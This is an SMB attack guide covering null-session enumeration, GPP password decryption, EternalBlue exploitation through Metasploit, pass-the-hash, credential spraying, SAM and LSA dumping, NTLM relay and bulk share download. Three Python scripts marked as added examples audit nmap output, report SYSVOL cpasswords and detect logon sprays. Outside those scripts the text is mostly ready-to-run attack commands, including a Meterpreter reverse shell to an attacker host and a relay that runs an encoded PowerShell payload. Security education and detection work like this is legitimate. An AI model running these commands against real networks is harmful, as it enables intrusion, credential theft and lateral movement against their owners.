SMB Exploitation Guide: EternalBlue, Pass-the-Hash, and Null Sessions
Server Message Block (SMB) is one of the most attacked protocols in enterprise networks. From the catastrophic EternalBlue exploit to everyday Pass-the-Hash lateral movement, SMB weaknesses have enabled some of the most impactful breaches in history. This guide covers the complete SMB attack surface.
SMB Protocol Basics
SMB runs on TCP port 445 (and legacy NetBIOS on 139). Key versions to understand:
- SMBv1 — Legacy, insecure, enabled by default on Windows 7/2008. Source of EternalBlue. Should be disabled everywhere.
- SMBv2/v3 — Modern, encrypted (SMBv3.1.1+), still vulnerable to relay attacks if signing is disabled.
Quick fingerprint with nmap:
nmap -p 139,445 --script smb-security-mode,smb2-security-mode,smb-vuln-ms17-010 192.168.1.0/24
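The output of that nmap command is easier to act on when it is reduced to a per-host remediation list. The following Python script is an added example (not part of the original guide) that parses the plain-text output of `smb-security-mode`, `smb2-security-mode` and `smb-vuln-ms17-010` and flags three things a defender cares about: SMBv1 still being negotiated, SMB signing not being required, and an MS17-010 result reported as vulnerable. The embedded scan output is constructed to mimic nmap's formatting and is not a real scan; the script name and function names are my own.

```python
"""Audit helper: parse the text output of
`nmap -p 445 --script smb-security-mode,smb2-security-mode,smb-vuln-ms17-010`
into a per-host remediation list.  Added example; the sample output below is
constructed to mimic nmap's formatting and is not a real scan."""
import re
import sys

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.10
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE

Nmap scan report for 192.168.1.20
Host is up (0.0009s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

HOST_HEADER = re.compile(r"^Nmap scan report for (\S+)", re.MULTILINE)
SMB2_SIGNING = re.compile(
    r"Message signing (enabled and required|enabled but not required|disabled)")


def parse_smb_scan(text):
    """Return one dict per host describing its SMBv1 / signing / MS17-010 state."""
    headers = list(HOST_HEADER.finditer(text))
    results = []
    for idx, header in enumerate(headers):
        end = headers[idx + 1].start() if idx + 1 < len(headers) else len(text)
        block = text[header.start():end]
        # smb-security-mode only produces output when the host negotiates SMBv1,
        # so its presence is a usable proxy for "SMBv1 still enabled".
        smbv1 = "smb-security-mode:" in block
        smb2 = SMB2_SIGNING.search(block)
        signing_required = bool(smb2) and smb2.group(1) == "enabled and required"
        ms17_010 = "smb-vuln-ms17-010" in block and "State: VULNERABLE" in block
        findings = []
        if smbv1:
            findings.append("SMBv1 accepted: disable the SMB1 protocol feature")
        if smb2 and not signing_required:
            findings.append("SMB signing not required: enforce RequireSecuritySignature (relay exposure)")
        if ms17_010:
            findings.append("MS17-010 reported vulnerable: patch and isolate until done")
        results.append({"host": header.group(1), "smbv1": smbv1,
                        "signing_required": signing_required, "ms17_010": ms17_010,
                        "findings": findings})
    return results


def hosts_needing_action(text):
    """Hosts with at least one finding, in scan order."""
    return [r["host"] for r in parse_smb_scan(text) if r["findings"]]


if __name__ == "__main__":
    # Usage: python3 smb_audit.py scan.txt   (falls back to the constructed sample)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    for entry in parse_smb_scan(data):
        status = "; ".join(entry["findings"]) or "OK"
        print(f"{entry['host']}: {status}")
```

Run it against a saved `nmap -oN` file; hosts that come back with the "signing not required" finding are the same ones a relay attack would target, so that list doubles as the remediation queue for enforcing signing by Group Policy.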
Null Session Enumeration
Null sessions allow unauthenticated SMB connections that can enumerate users, groups, shares, and policies. Common on older Windows and misconfigured Samba.
# enum4linux — comprehensive null session enumeration
enum4linux -a 192.168.1.10
# Enumerate shares only
enum4linux -S 192.168.1.10
# smbclient — connect anonymously and list shares
smbclient -L //192.168.1.10 -N
# Connect to a specific share
smbclient //192.168.1.10/SYSVOL -N
# CrackMapExec null session
crackmapexec smb 192.168.1.10 -u '' -p '' --shares
crackmapexec smb 192.168.1.10 -u '' -p '' --users
Always check SYSVOL and NETLOGON for Group Policy Preferences (GPP) XML files — they may contain cpassword fields encrypted with a publicly known AES key.
# Decrypt GPP password (gpp-decrypt tool)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ7zWmVHDittvgCQCJGS5xo=
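From the defensive side, the useful check is whether any GPP XML in SYSVOL still carries a cpassword at all, because every such entry is a credential exposed to every domain user. The following Python script is an added example, not part of the original guide: it walks a mounted or copied SYSVOL tree, parses the preference files that can hold cpassword, and reports the item and account so the GPO can be removed and the password rotated. It never decrypts anything. The sample Groups.xml is constructed, the blob value is a placeholder, and the script and function names are my own.

```python
"""SYSVOL audit: report Group Policy Preference items that still carry a cpassword
attribute, so the GPO can be deleted and the account's password rotated.
Added example, not part of the original guide; it only reports and never decrypts."""
import os
import sys
import xml.etree.ElementTree as ET

# GPP XML files that can carry cpassword, compared case-insensitively.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# The attribute naming the account differs per preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample Groups.xml: one item sets a password (placeholder blob),
# one has an empty cpassword and must not be reported.
SAMPLE_GROUPS_XML = """\
<Groups>
  <User name="svc_backup" changed="2024-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED_PLACEHOLDER_BLOB" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
  <User name="helpdesk" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" userName="helpdesk" cpassword=""/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """One finding per preference item whose <Properties> has a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for item in root:                       # <User>, <NTService>, <Task>, <Drive>, ...
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), None)
        findings.append({"source": source, "item": item.tag,
                         "name": item.get("name"), "account": account,
                         "changed": item.get("changed")})
    return findings


def scan_sysvol(root_dir):
    """Walk a mounted or copied SYSVOL tree and collect cpassword findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (OSError, ET.ParseError) as exc:
                print(f"skipping {path}: {exc}", file=sys.stderr)
    return findings


if __name__ == "__main__":
    # Usage: python3 gpp_audit.py /mnt/sysvol   (falls back to the constructed sample)
    hits = (scan_sysvol(sys.argv[1]) if len(sys.argv) > 1
            else find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"))
    for hit in hits:
        print(f"{hit['source']}: {hit['item']} '{hit['name']}' sets a cpassword for {hit['account']}")
```

The `changed` timestamp tells you how long the credential has been exposed; treat every reported account as compromised regardless of whether the GPO is still linked, since old SYSVOL copies and backups keep the file.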
EternalBlue (MS17-010) Detection and Exploitation
EternalBlue is a critical SMBv1 vulnerability (CVE-2017-0144) weaponised by the NSA's ETERNALBLUE exploit, leaked by Shadow Brokers, and used in WannaCry and NotPetya. Unpatched Windows XP, 7, 2003, and 2008 systems are vulnerable.
# Detect with nmap NSE script
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10
# Metasploit exploitation
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 10.10.10.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
# Non-metasploit: PoC scanner
python3 checker.py 192.168.1.10
Always verify vulnerability before exploitation in production-adjacent environments. EternalBlue can crash unpatched servers.
Pass-the-Hash via SMB
With a valid NTLM hash (from Mimikatz, secretsdump, or responder captures), you can authenticate to remote systems without the plaintext password.
# psexec — creates a service, spawns SYSTEM shell
psexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20
# smbexec — executes commands via SMB, no binary dropped
smbexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20
# wmiexec — WMI execution, quieter than psexec
wmiexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20 "whoami"
# Mount a share with PTH (useful for file access)
smbclient //192.168.1.20/C$ -U 'CORP/Administrator%aad3b435b51404eeaad3b435b51404ee:NTLMHASH'
CrackMapExec for Enumeration and Lateral Movement
CrackMapExec (CME) / NetExec is the Swiss Army knife of SMB lateral movement. It scales attacks across entire subnets.
# Credential spray across subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -p 'Password123'
# Spray NTLM hashes
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH
# Dump SAM database on successful auth
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' --lsa
# Execute command
crackmapexec smb 192.168.1.20 -u Administrator -p 'Password123' -x "ipconfig /all"
# Enumerate logged-on users
crackmapexec smb 192.168.1.0/24 -u Administrator -p 'Password123' --loggedon-users
# Spider shares for sensitive files
crackmapexec smb 192.168.1.20 -u lowpriv -p 'Pass123' -M spider_plus
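A spray or a subnet-wide command run like the ones above leaves a distinctive footprint on the targets: one source address and one account producing network logons (Security event 4624 for success, 4625 for failure, LogonType 3) on many different computers within seconds. The following Python detection logic is an added example, not part of the original guide; it is the check a SOC would run over collected logon events. The event records are constructed to look like a CrackMapExec spray across a /24 as a SIEM would ingest them, the field names are my own simplification of the Windows event fields, and the thresholds are assumptions to tune per environment.

```python
"""Detection logic for credential spraying and one-account fan-out over SMB, run
over Windows logon events (4624 success / 4625 failure, LogonType 3 = network).
Added example, not part of the original guide; the events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: "computer" is the host that logged the event, "source_ip"
# the client that authenticated to it.  Field names are a simplification.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "event_id": 4625, "account": "Administrator",
     "computer": "192.168.1.11", "source_ip": "10.10.10.10", "logon_type": 3, "auth_package": "NTLM"},
    {"time": "2024-05-01T10:00:02", "event_id": 4625, "account": "Administrator",
     "computer": "192.168.1.12", "source_ip": "10.10.10.10", "logon_type": 3, "auth_package": "NTLM"},
    {"time": "2024-05-01T10:00:03", "event_id": 4625, "account": "Administrator",
     "computer": "192.168.1.13", "source_ip": "10.10.10.10", "logon_type": 3, "auth_package": "NTLM"},
    {"time": "2024-05-01T10:00:04", "event_id": 4625, "account": "Administrator",
     "computer": "192.168.1.14", "source_ip": "10.10.10.10", "logon_type": 3, "auth_package": "NTLM"},
    {"time": "2024-05-01T10:00:05", "event_id": 4624, "account": "Administrator",
     "computer": "192.168.1.20", "source_ip": "10.10.10.10", "logon_type": 3, "auth_package": "NTLM"},
    # Benign: an admin opening two file shares with Kerberos half an hour later.
    {"time": "2024-05-01T10:30:00", "event_id": 4624, "account": "jdoe",
     "computer": "192.168.1.50", "source_ip": "10.10.20.5", "logon_type": 3, "auth_package": "Kerberos"},
    {"time": "2024-05-01T10:31:00", "event_id": 4624, "account": "jdoe",
     "computer": "192.168.1.51", "source_ip": "10.10.20.5", "logon_type": 3, "auth_package": "Kerberos"},
]


def detect_fanout(events, window=timedelta(minutes=5), min_hosts=5):
    """Alert when one (source_ip, account) pair touches >= min_hosts distinct computers
    via network logons inside a sliding window.  Mostly failures => spray; mostly
    successes => lateral fan-out (the pattern of --sam / -x over a subnet)."""
    by_pair = defaultdict(list)
    for ev in events:
        if ev["logon_type"] != 3 or ev["event_id"] not in (4624, 4625):
            continue
        by_pair[(ev["source_ip"], ev["account"])].append(
            (datetime.fromisoformat(ev["time"]), ev["computer"], ev["event_id"]))
    alerts = []
    for (src, acct), rows in by_pair.items():
        rows.sort()
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            hosts = {r[1] for r in in_window}
            if len(hosts) < min_hosts:
                continue
            failures = sum(1 for r in in_window if r[2] == 4625)
            successes = len(in_window) - failures
            alerts.append({"source_ip": src, "account": acct, "hosts": sorted(hosts),
                           "successes": successes, "failures": failures,
                           "first_seen": start.isoformat(),
                           "kind": "spray" if failures >= successes else "lateral-fanout"})
            break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_fanout(SAMPLE_EVENTS):
        print(f"{alert['kind']}: {alert['account']} from {alert['source_ip']} hit "
              f"{len(alert['hosts'])} hosts ({alert['successes']} ok / {alert['failures']} failed) "
              f"starting {alert['first_seen']}")
```

The single 4624 in the middle of a run of 4625s is the important detail: a spray that succeeds once is a compromise, not a noise event, so the alert carries the success count rather than suppressing on failures alone. Keying on the source address as well as the account is what separates a spray from a help-desk account that legitimately logs on to many machines from many places.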
SMB Relay Attacks
When SMB signing is disabled (common on workstations), you can relay captured NTLM authentication to other systems — no cracking required. Responder captures the hash; ntlmrelayx relays it in real time.
# Step 1: Check which hosts have SMB signing disabled
crackmapexec smb 192.168.1.0/24 --gen-relay-list unsigned_hosts.txt
# Or: nmap --script smb2-security-mode
# Step 2: Start Responder (disable SMB and HTTP so ntlmrelayx can bind)
# Edit /etc/responder/Responder.conf: SMB = Off, HTTP = Off
responder -I eth0 -rdw
# Step 3: Start ntlmrelayx targeting unsigned hosts
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support
# Relay to specific target with command execution
ntlmrelayx.py -t 192.168.1.30 -smb2support -c "powershell -enc BASE64PAYLOAD"
# Relay and dump SAM automatically
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support --sam
Trigger authentication by poisoning LLMNR/NBT-NS (Responder does this automatically) or by coercing authentication via PrinterBug / PetitPotam.
Anonymous Share Enumeration
# List all open shares across a range
crackmapexec smb 192.168.1.0/24 -u '' -p '' --shares 2>/dev/null | grep READ
# Recursive listing of readable share
smbmap -H 192.168.1.10 -R
# Authenticated share mapping
smbmap -H 192.168.1.10 -u lowpriv -p 'Password123' -R --depth 5
# Download entire readable share
smbclient //192.168.1.10/Files -N -c 'recurse; prompt; mget *'